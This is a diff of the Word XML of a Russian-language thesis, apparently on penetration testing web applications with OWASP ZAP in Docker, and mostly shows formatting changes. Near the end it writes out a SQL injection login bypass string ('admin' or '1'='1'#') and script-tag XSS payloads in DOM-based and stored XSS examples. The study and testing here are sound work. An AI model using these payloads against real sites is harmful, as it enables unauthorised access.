-  <w:style w:type="table" w:styleId="977" w:default="1">
+  <w:style w:type="table" w:styleId="987" w:default="1">
     <w:name w:val="Normal Table"/>
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>

--- a/diplom/PenTest/diplom_pt_ver2.docx
+++ b/diplom/PenTest/diplom_pt_ver2.docx
@@ -1,10 +1,10 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 wp14">
+<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se wp14">
   <w:body>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="afb"/>
+        <w:pStyle w:val="afa"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -12,7 +12,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="afb"/>
+        <w:pStyle w:val="afa"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -20,7 +20,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="afb"/>
+        <w:pStyle w:val="afa"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -28,7 +28,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="afb"/>
+        <w:pStyle w:val="afa"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -36,7 +36,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="afb"/>
+        <w:pStyle w:val="afa"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -44,7 +44,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="afb"/>
+        <w:pStyle w:val="afa"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -52,7 +52,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="afb"/>
+        <w:pStyle w:val="afa"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -60,7 +60,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="afb"/>
+        <w:pStyle w:val="afa"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -68,7 +68,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="afb"/>
+        <w:pStyle w:val="afa"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -76,7 +76,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="afb"/>
+        <w:pStyle w:val="afa"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -84,7 +84,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="afb"/>
+        <w:pStyle w:val="afa"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -92,7 +92,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="afb"/>
+        <w:pStyle w:val="afa"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -100,7 +100,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="afb"/>
+        <w:pStyle w:val="afa"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="48"/>
@@ -118,7 +118,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="afb"/>
+        <w:pStyle w:val="afa"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -168,7 +168,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="afb"/>
+        <w:pStyle w:val="afa"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
         </w:rPr>
@@ -306,7 +306,7 @@
         <w:bookmarkStart w:id="0" w:name="_Toc158883762" w:displacedByCustomXml="prev"/>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="aff2"/>
+            <w:pStyle w:val="aff1"/>
             <w:rPr>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:lang w:val="ru-RU"/>
@@ -331,7 +331,7 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="12"/>
+            <w:pStyle w:val="13"/>
             <w:rPr>
               <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
@@ -417,7 +417,7 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="12"/>
+            <w:pStyle w:val="13"/>
             <w:rPr>
               <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
@@ -486,7 +486,7 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="12"/>
+            <w:pStyle w:val="13"/>
             <w:rPr>
               <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
@@ -842,7 +842,7 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="12"/>
+            <w:pStyle w:val="13"/>
             <w:rPr>
               <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
@@ -1054,7 +1054,23 @@
                 <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                 <w:noProof/>
               </w:rPr>
-              <w:t>ZAP с графической оболочкой</w:t>
+              <w:t>ZAP с графи</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="ad"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>ч</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="ad"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>еской оболочкой</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1288,7 +1304,7 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="12"/>
+            <w:pStyle w:val="13"/>
             <w:rPr>
               <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
@@ -1562,7 +1578,7 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="12"/>
+            <w:pStyle w:val="13"/>
             <w:rPr>
               <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
@@ -1828,7 +1844,7 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="12"/>
+            <w:pStyle w:val="13"/>
             <w:rPr>
               <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
@@ -2144,7 +2160,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="aff5"/>
+        <w:pStyle w:val="aff4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="6"/>
@@ -2171,7 +2187,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="aff5"/>
+        <w:pStyle w:val="aff4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="6"/>
@@ -2190,7 +2206,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="aff5"/>
+        <w:pStyle w:val="aff4"/>
         <w:numPr>
           <w:ilvl w:val="0"/>
           <w:numId w:val="6"/>
@@ -4151,7 +4167,6 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4162,7 +4177,6 @@
         <w:t>docker</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4345,7 +4359,6 @@
         <w:t>wrk</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4364,7 +4377,6 @@
         <w:t>rw</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4611,7 +4623,6 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4622,7 +4633,6 @@
         <w:t>docker</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4725,7 +4735,6 @@
         </w:rPr>
       </w:pPr>
       <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4736,7 +4745,6 @@
         <w:t>docker</w:t>
       </w:r>
       <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -8465,6 +8473,7 @@
               <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
             </w:pPr>
             <w:hyperlink r:id="rId36" w:anchor="10104" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/8060/testreport.html#10104" w:history="1">
+              <w:proofErr w:type="spellStart"/>
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="ad"/>
@@ -8472,7 +8481,17 @@
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
                 </w:rPr>
-                <w:t xml:space="preserve">User </w:t>
+                <w:t>User</w:t>
+              </w:r>
+              <w:proofErr w:type="spellEnd"/>
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="ad"/>
+                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                  <w:color w:val="auto"/>
+                  <w:sz w:val="24"/>
+                </w:rPr>
+                <w:t xml:space="preserve"> </w:t>
               </w:r>
               <w:proofErr w:type="spellStart"/>
               <w:r>
@@ -11402,6 +11421,7 @@
               <w:spacing w:after="0" w:line="57" w:lineRule="atLeast"/>
             </w:pPr>
             <w:hyperlink r:id="rId58" w:anchor="10104" w:tooltip="file:///run/media/novivits/KINGSTON/Vitaliy/PenTest/ZAP_docker/7799/testreport7799.html#10104" w:history="1">
+              <w:proofErr w:type="spellStart"/>
               <w:r>
                 <w:rPr>
                   <w:rStyle w:val="ad"/>
@@ -11409,7 +11429,17 @@
                   <w:color w:val="auto"/>
                   <w:sz w:val="24"/>
                 </w:rPr>
-                <w:t xml:space="preserve">User </w:t>
+                <w:t>User</w:t>
+              </w:r>
+              <w:proofErr w:type="spellEnd"/>
+              <w:r>
+                <w:rPr>
+                  <w:rStyle w:val="ad"/>
+                  <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                  <w:color w:val="auto"/>
+                  <w:sz w:val="24"/>
+                </w:rPr>
+                <w:t xml:space="preserve"> </w:t>
               </w:r>
               <w:proofErr w:type="spellStart"/>
               <w:r>
@@ -12188,27 +12218,7 @@
                 <w:bCs/>
                 <w:lang w:val="en-US"/>
               </w:rPr>
-              <w:t xml:space="preserve"> CVSS (</w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>AV:N</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:lang w:val="en-US"/>
-              </w:rPr>
-              <w:t>/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</w:t>
+              <w:t xml:space="preserve"> CVSS (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -12382,7 +12392,6 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12390,9 +12399,84 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>admin</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>admin' or '1'='1'#</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Cross Site Scripting (DOM Based)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve">На сайте есть форма для отправки комментариев, которая динамически добавляет содержимое комментария на страницу. Злоумышленник может ввести вредоносный код </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>JavaScript</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> в поле комментария, который затем будет добавлен на страницу и выполнен в контексте DOM.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>Пример формы с внедрением XSS:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="709"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12400,73 +12484,8 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>' or '1'='1'#</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="709"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>Cross Site Scripting (DOM Based)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="709"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve">На сайте есть форма для отправки комментариев, которая динамически добавляет содержимое комментария на страницу. Злоумышленник может ввести вредоносный код </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>JavaScript</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> в поле комментария, который затем будет добавлен на страницу и выполнен в контексте DOM.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
-        <w:ind w:firstLine="709"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-        </w:rPr>
-        <w:t>Пример формы с внедрением XSS:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="709"/>
-      </w:pPr>
+        <w:t>html</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12478,7 +12497,6 @@
           <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12486,9 +12504,8 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>html</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>&lt;form action="/submit" method="post"&gt;</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12507,19 +12524,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>&lt;form action="/submit" method="post"&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="709"/>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
+        <w:t xml:space="preserve">    &lt;script&gt;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12527,9 +12534,9 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t xml:space="preserve">    &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
+        <w:t>alert(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12537,29 +12544,134 @@
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>script&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+        <w:t>'Cross Site Scripting (DOM Based) 2')&lt;/script&gt;"&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="709"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
-        <w:t>alert('Cross Site Scripting (DOM Based) 2')&lt;/script&gt;"&gt;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="0"/>
-        <w:ind w:firstLine="709"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
+        <w:t>&lt;/form&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Cross Site Scripting (Persistent)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>На сайте есть возможность есть форма, где пользователи могут создавать и публиковать свои посты. На сайте сохраняется содержимое поста в базе данных и отображает его на странице без должной фильтрации.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>Добавление скрипта на форуме:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:ind w:firstLine="709"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>&lt;!--</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Форма создания поста --&gt;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
